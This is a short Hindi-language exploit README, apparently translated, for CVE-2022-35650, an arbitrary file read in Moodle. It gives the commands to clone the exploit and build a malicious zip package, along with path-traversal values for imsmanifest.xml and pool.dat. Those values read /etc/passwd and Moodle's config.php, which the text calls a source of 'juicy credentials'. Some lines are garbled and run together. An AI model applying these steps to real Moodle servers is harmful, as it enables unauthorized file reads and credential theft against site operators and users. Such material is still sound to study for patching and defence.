
CVE-2022-35650 के लिए शोषण, एक Moodle मनमाना फ़ाइल पढ़ना।
यह Moodle में एक मनमाना फ़ाइल पढ़ना है।
आपके पास एक शिक्षक या व्यवस्थापक स्तर के उपयोगकर्ता से समझौता होना चाहिए।
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd) डाउनलोड होती है/etc/passwd की सामग्री हैयदि आप कॉन्फ़िग फ़ाइल (रसदार क्रेडेंशियल्स के साथ) पढ़ना चाहते हैं, तो अपने baseurl को imsmanifest.xml में इस प्रकार सेट करें:
../../../../../../../../../../../var/www/html
और pool.dat में अपने img src को इस प्रकार सेट करें:
muc/config.php